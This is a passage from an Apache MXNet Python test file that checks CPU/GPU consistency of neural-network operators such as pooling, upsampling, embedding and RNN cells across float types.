@unittest.skip("test fails intermittently. temporarily disabled till it gets fixed. https://github.com/apache/incubator-mxnet/issues/11839")
@with_seed()
def test_spatial_transformer_with_type():
data = mx.sym.Variable('data')
loc = mx.sym.Flatten(data)
loc = mx.sym.FullyConnected(data=loc, num_hidden=10)
loc = mx.sym.Activation(data=loc, act_type='relu')
loc = mx.sym.FullyConnected(data=loc, num_hidden=6)
sym = mx.sym.SpatialTransformer(data=data, loc=loc, target_shape=(10, 10),
transform_type="affine", sampler_type="bilinear")
ctx_list = [{'ctx': mx.gpu(0), 'data': (1, 5, 10, 10), 'type_dict': {'data': np.float64}},
{'ctx': mx.cpu(0), 'data': (1, 5, 10, 10), 'type_dict': {'data': np.float64}}]
check_consistency(sym, ctx_list)
check_consistency(sym, ctx_list, grad_req="add")
# Checking max pooling consistency over the data sets of different float types is problematic
# as one max value in a float32 data set may not be the max value in a float16 data set.
# This function will not be called.
@with_seed(1234)
def test_pooling_with_type():
ctx_list = [{'ctx': mx.gpu(0), 'pool_data': (10, 2, 10, 10), 'type_dict': {'pool_data': np.float64}},
{'ctx': mx.gpu(0), 'pool_data': (10, 2, 10, 10), 'type_dict': {'pool_data': np.float32}},
{'ctx': mx.gpu(0), 'pool_data': (10, 2, 10, 10), 'type_dict': {'pool_data': np.float16}},
{'ctx': mx.cpu(0), 'pool_data': (10, 2, 10, 10), 'type_dict': {'pool_data': np.float64}},
{'ctx': mx.cpu(0), 'pool_data': (10, 2, 10, 10), 'type_dict': {'pool_data': np.float32}}]
sym = mx.sym.Pooling(name='pool', kernel=(3,3), stride=(2,2), pool_type='max')
check_consistency(sym, ctx_list)
sym = mx.sym.Pooling(name='pool', kernel=(3,3), pad=(1,1), pool_type='avg')
check_consistency(sym, ctx_list)
# this is unstable
# sym = mx.sym.Pooling(name='pool', kernel=(5,5), pad=(2,2), pool_type='max')
# check_consistency(sym, ctx_list)
sym = mx.sym.Pooling(name='pool', kernel=(3,3), pad=(1,1), pool_type='sum')
check_consistency(sym, ctx_list)
@unittest.skip("Flaky test https://github.com/apache/incubator-mxnet/issues/11517")
@with_seed()
def test_pooling_versions():
def test_pooling_versions_helper(pool_op_list, data, kernel, pool_type, pad, stride, pooling_convention='valid',
global_pool=False, p_value=2, count_include_pad=True, tol=None):
ctx_list = []
sym_list = []
# PoolingV1 cpu
if 'pool_v1_cpu' in pool_op_list:
ctx_list.append({'ctx': mx.cpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}})
if not global_pool:
sym_list.append(mx.sym.Pooling_v1(kernel=kernel, pad=pad, stride=stride, pool_type=pool_type,
pooling_convention=pooling_convention, name='pool'))
else:
sym_list.append(mx.sym.Pooling_v1(kernel=kernel, pool_type=pool_type, global_pool=True, name='pool'))
# PoolingV1 gpu
if 'pool_v1_gpu' in pool_op_list:
ctx_list.append({'ctx': mx.gpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}})
if not global_pool:
sym_list.append(mx.sym.Pooling_v1(kernel=kernel, pad=pad, stride=stride, pool_type=pool_type,
pooling_convention=pooling_convention, name='pool'))
else:
sym_list.append(mx.sym.Pooling_v1(kernel=kernel, pool_type=pool_type, global_pool=True, name='pool'))
# Pooling cpu
if 'pool_cpu' in pool_op_list:
ctx_list.append({'ctx': mx.cpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}})
if not global_pool:
sym_list.append(mx.sym.Pooling(kernel=kernel, pad=pad, stride=stride, pool_type=pool_type,
pooling_convention=pooling_convention, name='pool',
p_value=p_value, count_include_pad=count_include_pad))
else:
sym_list.append(mx.sym.Pooling(kernel=kernel, pool_type=pool_type, global_pool=True, name='pool',
p_value=p_value, count_include_pad=count_include_pad))
# Pooling gpu
if 'pool_gpu' in pool_op_list:
ctx_list.append({'ctx': mx.gpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}})
if not global_pool:
sym_list.append(mx.sym.Pooling(kernel=kernel, pad=pad, stride=stride, pool_type=pool_type,
pooling_convention=pooling_convention, cudnn_off=True, name='pool',
p_value=p_value, count_include_pad=count_include_pad))
else:
sym_list.append(mx.sym.Pooling(kernel=kernel, pool_type=pool_type, global_pool=True, cudnn_off=True,
name='pool', p_value=p_value, count_include_pad=count_include_pad))
# CuDNNPooling
if 'pool_cudnn' in pool_op_list:
ctx_list.append({'ctx': mx.gpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}})
if not global_pool:
sym_list.append(mx.sym.Pooling(kernel=kernel, pad=pad, stride=stride, pool_type=pool_type,
pooling_convention=pooling_convention, p_value=p_value, cudnn_off=False,
name='pool', count_include_pad=count_include_pad))
else:
sym_list.append(mx.sym.Pooling(kernel=kernel, pool_type=pool_type, global_pool=True, p_value=p_value,
cudnn_off=False, name='pool', count_include_pad=count_include_pad))
check_consistency(sym_list, ctx_list, equal_nan=(not count_include_pad), tol=tol)
def test_1d_pooling(pool_type, p_value=2, count_include_pad=True):
data = (2, 3, 20)
kernel = (4,)
pad = (0,)
stride = (1,)
test_pooling_versions_helper(pool_op_list=['pool_cpu', 'pool_gpu'],
data=data, kernel=kernel, pad=pad, stride=stride, pool_type=pool_type,
pooling_convention='valid', global_pool=False, p_value=p_value,
count_include_pad=count_include_pad)
pad = (2,)
stride = (2,)
test_pooling_versions_helper(pool_op_list=['pool_cpu', 'pool_gpu'],
data=data, kernel=kernel, pad=pad, stride=stride, pool_type=pool_type,
pooling_convention='valid', global_pool=False, p_value=p_value,
count_include_pad=count_include_pad)
pad = (0,)
stride = (1,)
test_pooling_versions_helper(pool_op_list=['pool_cpu', 'pool_gpu'],
data=data, kernel=kernel, pad=pad, stride=stride, pool_type=pool_type,
pooling_convention='full', global_pool=False, p_value=p_value,
count_include_pad=count_include_pad)
pad = (2,)
stride = (2,)
test_pooling_versions_helper(pool_op_list=['pool_cpu', 'pool_gpu'],
data=data, kernel=kernel, pad=pad, stride=stride, pool_type=pool_type,
pooling_convention='full', global_pool=False, p_value=p_value,
count_include_pad=count_include_pad)
test_pooling_versions_helper(pool_op_list=['pool_cpu', 'pool_gpu'],
data=data, kernel=kernel, pad=pad, stride=stride, pool_type=pool_type,
global_pool=True, p_value=p_value, count_include_pad=count_include_pad)
def test_2d_pooling(pool_type, p_value=2, count_include_pad=True):
data = (2, 3, 20, 20)
kernel = (4, 5)
pad = (0, 0)
stride = (1, 1)
if pool_type == 'lp':
test_pooling_versions_helper(pool_op_list=['pool_cpu', 'pool_gpu'],
data=data, kernel=kernel, pad=pad, stride=stride, pool_type=pool_type,
pooling_convention='valid', global_pool=False, p_value=p_value)
else:
test_pooling_versions_helper(pool_op_list=['pool_v1_cpu', 'pool_v1_gpu', 'pool_cpu', 'pool_gpu', 'pool_cudnn'],
data=data, kernel=kernel, pad=pad, stride=stride, pool_type=pool_type,
pooling_convention='valid', global_pool=False, count_include_pad=count_include_pad)
# pool_v1 has bugs when pad is not 0, do not test PoolingV1 here
pad = (2, 3)
stride = (2, 3)
test_pooling_versions_helper(pool_op_list=['pool_cpu', 'pool_gpu', 'pool_cudnn'],
data=data, kernel=kernel, pad=pad, stride=stride, pool_type=pool_type,
pooling_convention='valid', global_pool=False, p_value=p_value,
count_include_pad=count_include_pad)
pad = (0, 0)
stride = (1, 1)
if pool_type == 'lp':
test_pooling_versions_helper(pool_op_list=['pool_cpu', 'pool_gpu', 'pool_cudnn'],
data=data, kernel=kernel, pad=pad, stride=stride, pool_type=pool_type,
pooling_convention='full', global_pool=False, p_value=p_value)
else:
if count_include_pad:
test_pooling_versions_helper(pool_op_list=['pool_v1_cpu', 'pool_v1_gpu', 'pool_cpu', 'pool_gpu', 'pool_cudnn'],
data=data, kernel=kernel, pad=pad, stride=stride, pool_type=pool_type,
pooling_convention='full', global_pool=False,
count_include_pad=count_include_pad)
else:
test_pooling_versions_helper(pool_op_list=['pool_cpu', 'pool_gpu', 'pool_cudnn'],
data=data, kernel=kernel, pad=pad, stride=stride, pool_type=pool_type,
pooling_convention='full', global_pool=False,
count_include_pad=count_include_pad)
# pool_v1 has bugs when pad is not 0, do not test PoolingV1 here
pad = (2, 3)
stride = (2, 3)
test_pooling_versions_helper(pool_op_list=['pool_cpu', 'pool_gpu', 'pool_cudnn'],
data=data, kernel=kernel, pad=pad, stride=stride, pool_type=pool_type,
pooling_convention='full', global_pool=False, p_value=p_value,
count_include_pad=count_include_pad)
if pool_type == 'lp':
test_pooling_versions_helper(pool_op_list=['pool_cpu', 'pool_gpu', 'pool_cudnn'],
data=data, kernel=kernel, pad=pad, stride=stride, pool_type=pool_type,
global_pool=True, p_value=p_value)
else:
test_pooling_versions_helper(pool_op_list=['pool_v1_cpu', 'pool_v1_gpu', 'pool_cpu', 'pool_gpu', 'pool_cudnn'],
data=data, kernel=kernel, pad=pad, stride=stride, pool_type=pool_type,
global_pool=True, count_include_pad=count_include_pad)
def test_3d_pooling(pool_type, p_value=2, count_include_pad=True):
data = (2, 3, 20, 20, 20)
kernel = (4, 5, 3)
pad = (0, 0, 0)
stride = (1, 1, 1)
test_pooling_versions_helper(pool_op_list=['pool_cpu', 'pool_gpu', 'pool_cudnn'],
data=data, kernel=kernel, pad=pad, stride=stride, pool_type=pool_type,
pooling_convention='valid', global_pool=False, p_value=p_value,
count_include_pad=count_include_pad)
pad = (2, 3, 3)
stride = (2, 3, 1)
test_pooling_versions_helper(pool_op_list=['pool_cpu', 'pool_gpu', 'pool_cudnn'],
data=data, kernel=kernel, pad=pad, stride=stride, pool_type=pool_type,
pooling_convention='valid', global_pool=False, p_value=p_value,
count_include_pad=count_include_pad)
pad = (0, 0, 0)
stride = (1, 1, 1)
test_pooling_versions_helper(pool_op_list=['pool_cpu', 'pool_gpu', 'pool_cudnn'],
data=data, kernel=kernel, pad=pad, stride=stride, pool_type=pool_type,
pooling_convention='full', global_pool=False, p_value=p_value,
count_include_pad=count_include_pad)
pad = (2, 3, 3)
stride = (2, 3, 1)
test_pooling_versions_helper(pool_op_list=['pool_cpu', 'pool_gpu', 'pool_cudnn'],
data=data, kernel=kernel, pad=pad, stride=stride, pool_type=pool_type,
pooling_convention='full', global_pool=False, p_value=p_value,
count_include_pad=count_include_pad)
test_pooling_versions_helper(pool_op_list=['pool_cpu', 'pool_gpu', 'pool_cudnn'],
data=data, kernel=kernel, pad=pad, stride=stride, pool_type=pool_type,
global_pool=True, p_value=p_value, count_include_pad=count_include_pad)
test_1d_pooling('max')
test_1d_pooling('avg', count_include_pad=True)
test_1d_pooling('avg', count_include_pad=False)
test_1d_pooling('sum')
test_1d_pooling('lp', p_value=1)
test_1d_pooling('lp', p_value=2)
test_1d_pooling('lp', p_value=3)
test_2d_pooling('max')
test_2d_pooling('avg', count_include_pad=True)
test_2d_pooling('avg', count_include_pad=False)
test_2d_pooling('sum')
test_2d_pooling('lp', p_value=1)
test_2d_pooling('lp', p_value=2)
test_2d_pooling('lp', p_value=3)
test_3d_pooling('max')
test_3d_pooling('avg', count_include_pad=True)
test_3d_pooling('avg', count_include_pad=False)
test_3d_pooling('sum')
test_3d_pooling('lp', p_value=1)
test_3d_pooling('lp', p_value=2)
test_3d_pooling('lp', p_value=3)
@with_seed()
def test_global_pooling():
def test_1d_pooling(pool_type, p_value=2):
data = (2, 3, 20)
kernel = (4,)
pad = (2,)
stride = (2,)
ctx_list = []
sym_list = []
pooling_convention = 'valid'
ctx_list.append({'ctx': mx.cpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}})
sym_list.append(mx.sym.Pooling(kernel=kernel, pad=pad, stride=stride, pool_type=pool_type,
pooling_convention=pooling_convention, global_pool=True, name='pool', p_value=p_value))
ctx_list.append({'ctx': mx.cpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}})
sym_list.append(mx.sym.Pooling(kernel=kernel, pool_type=pool_type,
pooling_convention=pooling_convention, global_pool=True, name='pool', p_value=p_value))
ctx_list.append({'ctx': mx.cpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}})
sym_list.append(mx.sym.Pooling(pool_type=pool_type,
pooling_convention=pooling_convention, global_pool=True, name='pool', p_value=p_value))
ctx_list.append({'ctx': mx.gpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}})
sym_list.append(mx.sym.Pooling(kernel=kernel, pad=pad, stride=stride, pool_type=pool_type,
pooling_convention=pooling_convention, global_pool=True, p_value=p_value, cudnn_off=False, name='pool'))
ctx_list.append({'ctx': mx.gpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}})
sym_list.append(mx.sym.Pooling(kernel=kernel, pool_type=pool_type,
pooling_convention=pooling_convention, global_pool=True, p_value=p_value, cudnn_off=False, name='pool'))
ctx_list.append({'ctx': mx.gpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}})
sym_list.append(mx.sym.Pooling(pool_type=pool_type,
pooling_convention=pooling_convention, global_pool=True, p_value=p_value, cudnn_off=False, name='pool'))
ctx_list.append({'ctx': mx.gpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}})
sym_list.append(mx.sym.Pooling(kernel=kernel, pad=pad, stride=stride, pool_type=pool_type,
pooling_convention=pooling_convention, global_pool=True, p_value=p_value, cudnn_off=True, name='pool'))
ctx_list.append({'ctx': mx.gpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}})
sym_list.append(mx.sym.Pooling(kernel=kernel, pool_type=pool_type,
pooling_convention=pooling_convention, global_pool=True, p_value=p_value, cudnn_off=True, name='pool'))
ctx_list.append({'ctx': mx.gpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}})
sym_list.append(mx.sym.Pooling(pool_type=pool_type,
pooling_convention=pooling_convention, global_pool=True, p_value=p_value, cudnn_off=True, name='pool'))
check_consistency(sym_list, ctx_list)
def test_2d_pooling(pool_type, p_value=2):
data = (2, 3, 20, 20)
kernel = (4, 4)
pad = (2, 2)
stride = (2, 2)
ctx_list = []
sym_list = []
pooling_convention = 'valid'
if pool_type != 'lp':
ctx_list.append({'ctx': mx.cpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}})
sym_list.append(mx.sym.Pooling_v1(kernel=kernel, pad=pad, stride=stride, pool_type=pool_type,
pooling_convention=pooling_convention, global_pool=True, name='pool'))
ctx_list.append({'ctx': mx.cpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}})
sym_list.append(mx.sym.Pooling_v1(kernel=kernel, pool_type=pool_type,
pooling_convention=pooling_convention, global_pool=True, name='pool'))
ctx_list.append({'ctx': mx.cpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}})
sym_list.append(mx.sym.Pooling_v1(pool_type=pool_type,
pooling_convention=pooling_convention, global_pool=True, name='pool'))
ctx_list.append({'ctx': mx.cpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}})
sym_list.append(mx.sym.Pooling(kernel=kernel, pad=pad, stride=stride, pool_type=pool_type,
pooling_convention=pooling_convention, global_pool=True, p_value=p_value, name='pool'))
ctx_list.append({'ctx': mx.cpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}})
sym_list.append(mx.sym.Pooling(kernel=kernel, pool_type=pool_type,
pooling_convention=pooling_convention, global_pool=True, p_value=p_value, name='pool'))
ctx_list.append({'ctx': mx.cpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}})
sym_list.append(mx.sym.Pooling(pool_type=pool_type,
pooling_convention=pooling_convention, global_pool=True, p_value=p_value, name='pool'))
ctx_list.append({'ctx': mx.gpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}})
sym_list.append(mx.sym.Pooling(kernel=kernel, pad=pad, stride=stride, pool_type=pool_type,
pooling_convention=pooling_convention, global_pool=True, p_value=p_value, cudnn_off=False, name='pool'))
ctx_list.append({'ctx': mx.gpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}})
sym_list.append(mx.sym.Pooling(kernel=kernel, pool_type=pool_type,
pooling_convention=pooling_convention, global_pool=True, p_value=p_value, cudnn_off=False, name='pool'))
ctx_list.append({'ctx': mx.gpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}})
sym_list.append(mx.sym.Pooling(pool_type=pool_type,
pooling_convention=pooling_convention, global_pool=True, p_value=p_value, cudnn_off=False, name='pool'))
ctx_list.append({'ctx': mx.gpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}})
sym_list.append(mx.sym.Pooling(kernel=kernel, pad=pad, stride=stride, pool_type=pool_type,
pooling_convention=pooling_convention, global_pool=True, p_value=p_value, cudnn_off=True, name='pool'))
ctx_list.append({'ctx': mx.gpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}})
sym_list.append(mx.sym.Pooling(kernel=kernel, pool_type=pool_type,
pooling_convention=pooling_convention, global_pool=True, p_value=p_value, cudnn_off=True, name='pool'))
ctx_list.append({'ctx': mx.gpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}})
sym_list.append(mx.sym.Pooling(pool_type=pool_type,
pooling_convention=pooling_convention, global_pool=True, p_value=p_value, cudnn_off=True, name='pool'))
check_consistency(sym_list, ctx_list)
test_1d_pooling('max')
test_1d_pooling('avg')
test_1d_pooling('sum')
test_1d_pooling('lp', p_value=1)
test_1d_pooling('lp', p_value=2)
test_1d_pooling('lp', p_value=3)
test_2d_pooling('max')
test_2d_pooling('avg')
test_2d_pooling('sum')
test_2d_pooling('lp', p_value=1)
test_2d_pooling('lp', p_value=2)
test_2d_pooling('lp', p_value=3)
@with_seed()
def test_upsampling_with_type():
sym = mx.sym.UpSampling(scale=2, num_filter=2, name='up', sample_type='nearest', num_args=1)
ctx_list = [{'ctx': mx.gpu(0), 'up_arg0': (2, 2, 2, 10), 'type_dict': {'up_arg0': np.float64}},
{'ctx': mx.gpu(0), 'up_arg0': (2, 2, 2, 10), 'type_dict': {'up_arg0': np.float32}},
{'ctx': mx.gpu(0), 'up_arg0': (2, 2, 2, 10), 'type_dict': {'up_arg0': np.float16}},
{'ctx': mx.cpu(0), 'up_arg0': (2, 2, 2, 10), 'type_dict': {'up_arg0': np.float64}},
{'ctx': mx.cpu(0), 'up_arg0': (2, 2, 2, 10), 'type_dict': {'up_arg0': np.float32}}]
check_consistency(sym, ctx_list)
@with_seed()
def test_upsampling_bilinear_with_type():
sym = mx.sym.UpSampling(scale=2, num_filter=2, name='up', sample_type='bilinear', num_args=1)
ctx_list = [{'ctx': mx.gpu(0), 'up_data': (2, 2, 2, 10), 'type_dict': {'up_data': np.float64}},
{'ctx': mx.gpu(0), 'up_data': (2, 2, 2, 10), 'type_dict': {'up_data': np.float32}},
{'ctx': mx.gpu(0), 'up_data': (2, 2, 2, 10), 'type_dict': {'up_data': np.float16}},
{'ctx': mx.cpu(0), 'up_data': (2, 2, 2, 10), 'type_dict': {'up_data': np.float64}},
{'ctx': mx.cpu(0), 'up_data': (2, 2, 2, 10), 'type_dict': {'up_data': np.float32}}]
check_consistency(sym, ctx_list)
@with_seed()
def test_concat_with_type():
sym = mx.sym.Concat(name='concat', num_args=2)
ctx_list = [{'ctx': mx.gpu(0), 'concat_arg1': (2, 10), 'concat_arg0': (2, 10),
'type_dict': {'concat_arg0': np.float64, 'concat_arg1': np.float64}},
{'ctx': mx.gpu(0), 'concat_arg1': (2, 10), 'concat_arg0': (2, 10),
'type_dict': {'concat_arg0': np.float32, 'concat_arg1': np.float32}},
{'ctx': mx.gpu(0), 'concat_arg1': (2, 10), 'concat_arg0': (2, 10),
'type_dict': {'concat_arg0': np.float16, 'concat_arg1': np.float16}},
{'ctx': mx.cpu(0), 'concat_arg1': (2, 10), 'concat_arg0': (2, 10),
'type_dict': {'concat_arg0': np.float64, 'concat_arg1': np.float64}},
{'ctx': mx.cpu(0), 'concat_arg1': (2, 10), 'concat_arg0': (2, 10),
'type_dict': {'concat_arg0': np.float32, 'concat_arg1': np.float32}}]
check_consistency(sym, ctx_list)
@with_seed()
def test_elementwisesum_with_type():
dev_types = [[mx.gpu(0), [np.float64, np.float32, np.float16]],
[mx.cpu(0), [np.float64, np.float32]] ]
for num_args in range(1, 6):
ews_arg_shape = {}
for i in range(num_args):
ews_arg_shape['ews_arg'+str(i)] = (2, 10)
sym = mx.sym.ElementWiseSum(name='ews', num_args=num_args)
ctx_list = []
for dev, types in dev_types:
for dtype in types:
ews_arg_dtype = {'type_dict':{}}
for i in range(num_args):
ews_arg_dtype['type_dict']['ews_arg'+str(i)] = dtype
ctx_elem = {'ctx': dev}
ctx_elem.update(ews_arg_shape)
ctx_elem.update(ews_arg_dtype)
ctx_list.append(ctx_elem)
check_consistency(sym, ctx_list)
@with_seed()
def test_reshape_with_type():
sym = mx.sym.Reshape(name='reshape', shape=(-1,1,1,0))
ctx_list = [{'ctx': mx.gpu(0), 'reshape_data': (2, 2, 2, 10), 'type_dict': {'reshape_data': np.float64}},
{'ctx': mx.gpu(0), 'reshape_data': (2, 2, 2, 10), 'type_dict': {'reshape_data': np.float32}},
{'ctx': mx.gpu(0), 'reshape_data': (2, 2, 2, 10), 'type_dict': {'reshape_data': np.float16}},
{'ctx': mx.cpu(0), 'reshape_data': (2, 2, 2, 10), 'type_dict': {'reshape_data': np.float64}},
{'ctx': mx.cpu(0), 'reshape_data': (2, 2, 2, 10), 'type_dict': {'reshape_data': np.float32}}]
check_consistency(sym, ctx_list)
@with_seed()
def test_blockgrad_with_type():
sym = mx.sym.BlockGrad(name='bg')
ctx_list = [{'ctx': mx.gpu(0), 'bg_data': (2, 2, 2, 10), 'type_dict': {'bg_data': np.float64}},
{'ctx': mx.gpu(0), 'bg_data': (2, 2, 2, 10), 'type_dict': {'bg_data': np.float32}},
{'ctx': mx.gpu(0), 'bg_data': (2, 2, 2, 10), 'type_dict': {'bg_data': np.float16}},
{'ctx': mx.cpu(0), 'bg_data': (2, 2, 2, 10), 'type_dict': {'bg_data': np.float64}},
{'ctx': mx.cpu(0), 'bg_data': (2, 2, 2, 10), 'type_dict': {'bg_data': np.float32}}]
check_consistency(sym, ctx_list)
@with_seed()
def test_swapaxis_with_type():
sym = mx.sym.SwapAxis(name='swap', dim1=1)
ctx_list = [{'ctx': mx.gpu(0), 'swap_data': (2, 2, 2, 10), 'type_dict': {'swap_data': np.float64}},
{'ctx': mx.gpu(0), 'swap_data': (2, 2, 2, 10), 'type_dict': {'swap_data': np.float32}},
{'ctx': mx.gpu(0), 'swap_data': (2, 2, 2, 10), 'type_dict': {'swap_data': np.float16}},
{'ctx': mx.cpu(0), 'swap_data': (2, 2, 2, 10), 'type_dict': {'swap_data': np.float64}},
{'ctx': mx.cpu(0), 'swap_data': (2, 2, 2, 10), 'type_dict': {'swap_data': np.float32}}]
check_consistency(sym, ctx_list)
@with_seed()
def test_fullyconnected_with_type():
sym = mx.sym.FullyConnected(num_hidden=3, name='inner')
ctx_list = [{'ctx': mx.gpu(0), 'inner_data': (2, 10), 'type_dict': {'inner_data': np.float64}},
{'ctx': mx.gpu(0), 'inner_data': (2, 10), 'type_dict': {'inner_data': np.float32}},
{'ctx': mx.gpu(0), 'inner_data': (2, 10), 'type_dict': {'inner_data': np.float16}},
{'ctx': mx.cpu(0), 'inner_data': (2, 10), 'type_dict': {'inner_data': np.float64}},
{'ctx': mx.cpu(0), 'inner_data': (2, 10), 'type_dict': {'inner_data': np.float32}}]
check_consistency(sym, ctx_list)
# Sizes are divisible by 8 to test TensorCore on Volta GPU.
sym = mx.sym.FullyConnected(num_hidden=8, name='inner')
ctx_list = [{'ctx': mx.gpu(0), 'inner_data': (16, 24), 'type_dict': {'inner_data': np.float16}},
{'ctx': mx.cpu(0), 'inner_data': (16, 24), 'type_dict': {'inner_data': np.float32}}]
check_consistency(sym, ctx_list)
@with_seed()
def test_activation_with_type():
act_types = ['relu', 'sigmoid', 'tanh', 'softrelu', 'softsign']
shape = (2, 2, 10, 10)
for act_type in act_types:
sym = mx.sym.Activation(name='act', act_type=act_type)
ctx_list = [{'ctx': mx.gpu(0), 'act_data': shape, 'type_dict': {'act_data': np.float64}},
{'ctx': mx.gpu(0), 'act_data': shape, 'type_dict': {'act_data': np.float32}},
{'ctx': mx.gpu(0), 'act_data': shape, 'type_dict': {'act_data': np.float16}},
{'ctx': mx.cpu(0), 'act_data': shape, 'type_dict': {'act_data': np.float64}},
{'ctx': mx.cpu(0), 'act_data': shape, 'type_dict': {'act_data': np.float32}},
{'ctx': mx.cpu(0), 'act_data': shape, 'type_dict': {'act_data': np.float16}}]
check_consistency(sym, ctx_list)
@with_seed()
def test_lrn():
sym = mx.sym.LRN(alpha=0.0001, beta=0.75, knorm=2, nsize=5, name='lrn')
ctx_list = [{'ctx': mx.gpu(0), 'lrn_data': (2, 6, 10, 10), 'type_dict': {'lrn_data': np.float32}},
{'ctx': mx.cpu(0), 'lrn_data': (2, 6, 10, 10), 'type_dict': {'lrn_data': np.float32}}]
check_consistency(sym, ctx_list)
@with_seed()
def test_embedding_with_type():
def test_embedding_helper(data_types, weight_types, low_pad, high_pad):
NVD = [[20, 10, 20], [200, 10, 300]]
for N, V, D in NVD:
sym = mx.sym.Embedding(name='embedding', input_dim=V, output_dim=D)
ctx_list = []
for data_type in data_types:
for weight_type in weight_types:
ctx_list.append({'ctx': mx.gpu(0), 'embedding_data': (N,),
'type_dict': {'embedding_data': data_type, 'embedding_weight': weight_type}})
ctx_list.append({'ctx': mx.cpu(0), 'embedding_data': (N,),
'type_dict': {'embedding_data': data_type, 'embedding_weight': weight_type}})
arg_params = {'embedding_data': np.random.randint(low=-low_pad, high=V+high_pad, size=(N,))}
check_consistency(sym, ctx_list, grad_req={'embedding_data': 'null','embedding_weight': 'write'},
arg_params=arg_params)
data_types = [np.float16, np.float32, np.float64, np.int32]
weight_types = [np.float16, np.float32, np.float64]
test_embedding_helper(data_types, weight_types, 5, 5)
data_types = [np.uint8]
weight_types = [np.float16, np.float32, np.float64]
test_embedding_helper(data_types, weight_types, 0, 5)
@with_seed()
def test_svmoutput_with_type():
sym = mx.sym.SVMOutput(name='svmoutput', use_linear=True)
ctx_list = [{'ctx': mx.gpu(0), 'svmoutput_data': (20, 10), 'type_dict': {'svmoutput_data': np.float64}},
{'ctx': mx.gpu(0), 'svmoutput_data': (20, 10), 'type_dict': {'svmoutput_data': np.float32}},
{'ctx': mx.gpu(0), 'svmoutput_data': (20, 10), 'type_dict': {'svmoutput_data': np.float16}},
{'ctx': mx.cpu(0), 'svmoutput_data': (20, 10), 'type_dict': {'svmoutput_data': np.float64}},
{'ctx': mx.cpu(0), 'svmoutput_data': (20, 10), 'type_dict': {'svmoutput_data': np.float32}},
{'ctx': mx.cpu(0), 'svmoutput_data': (20, 10), 'type_dict': {'svmoutput_data': np.float16}}]
check_consistency(sym, ctx_list, use_uniform=True)
@with_seed()
def test_take_with_type():
sym = mx.sym.take(name='take')
for data_ndim in range(2, 5):
for idx_ndim in range(1, 4):
data_shape = ()
for _ in range(data_ndim):
data_shape += (np.random.randint(low=3, high=6), )
idx_shape = ()
for _ in range(idx_ndim):
idx_shape += (np.random.randint(low=3, high=5), )
ctx_list = [{'ctx': mx.gpu(0), 'take_indices': idx_shape,
'take_a': data_shape,
'type_dict': {'take_indices': np.float64,
'take_a': np.float64}},
{'ctx': mx.gpu(0), 'take_indices': idx_shape,
'take_a': data_shape,
'type_dict': {'take_indices': np.float32,
'take_a': np.float32}},
{'ctx': mx.gpu(0), 'take_indices': idx_shape,
'take_a': data_shape,
'type_dict': {'take_indices': np.float16,
'take_a': np.float16}},
{'ctx': mx.cpu(0), 'take_indices': idx_shape,
'take_a': data_shape,
'type_dict': {'take_indices': np.float64,
'take_a': np.float64}},
{'ctx': mx.cpu(0), 'take_indices': idx_shape,
'take_a': data_shape,
'type_dict': {'take_indices': np.float32,
'take_a': np.float32}},
{'ctx': mx.cpu(0), 'take_indices': idx_shape,
'take_a': data_shape,
'type_dict': {'take_indices': np.float16,
'take_a': np.float16}}]
arg_params = {'take_indices': np.random.randint(low=0,
high=data_shape[0],
size=idx_shape),
'take_a': np.random.normal(size=data_shape)}
check_consistency(sym, ctx_list,
grad_req={'take_indices': 'null',
'take_a': 'write'},
arg_params=arg_params)
def check_rnn_consistency(cell1, cell2):
dshape = (32, 5, 200)
data = mx.sym.Variable('data')
sym1, _ = cell1.unroll(5, data, merge_outputs=True)
mod1 = mx.mod.Module(sym1, label_names=None, context=mx.gpu(0))
mod1.bind(data_shapes=[('data', dshape)], label_shapes=None)
sym2, _ = cell2.unroll(5, data, merge_outputs=True)
mod2 = mx.mod.Module(sym2, label_names=None, context=mx.gpu(0))
mod2.bind(data_shapes=[('data', dshape)], label_shapes=None)
mod1.init_params()
args, auxs = mod1.get_params()
args = cell1.unpack_weights(args)
args = cell2.pack_weights(args)
mod2.set_params(args, auxs)
batch=mx.io.DataBatch(data=[mx.random.uniform(shape=dshape)], label=[])
mod1.forward(batch, is_train=False)
mod2.forward(batch, is_train=False)
assert_allclose(mod1.get_outputs()[0].asnumpy(), mod2.get_outputs()[0].asnumpy(), rtol=1e-2, atol=1e-4)
@with_seed()
@assert_raises_cudnn_disabled()
def test_rnn():
fused = mx.rnn.FusedRNNCell(100, num_layers=2, mode='rnn_relu', prefix='')
stack = mx.rnn.SequentialRNNCell()
stack.add(mx.rnn.RNNCell(100, activation='relu', prefix='l0_'))
stack.add(mx.rnn.RNNCell(100, activation='relu', prefix='l1_'))
check_rnn_consistency(fused, stack)
check_rnn_consistency(stack, fused)
@with_seed()
@assert_raises_cudnn_disabled()
def test_lstm_forget_bias():
forget_bias = 2.0
fused = mx.rnn.FusedRNNCell(10, forget_bias=forget_bias, num_layers=2, mode='lstm', prefix='')
dshape = (32, 1, 20)
data = mx.sym.Variable('data')
sym, _ = fused.unroll(1, data, merge_outputs=True)
mod = mx.mod.Module(sym, label_names=None, context=mx.gpu(0))
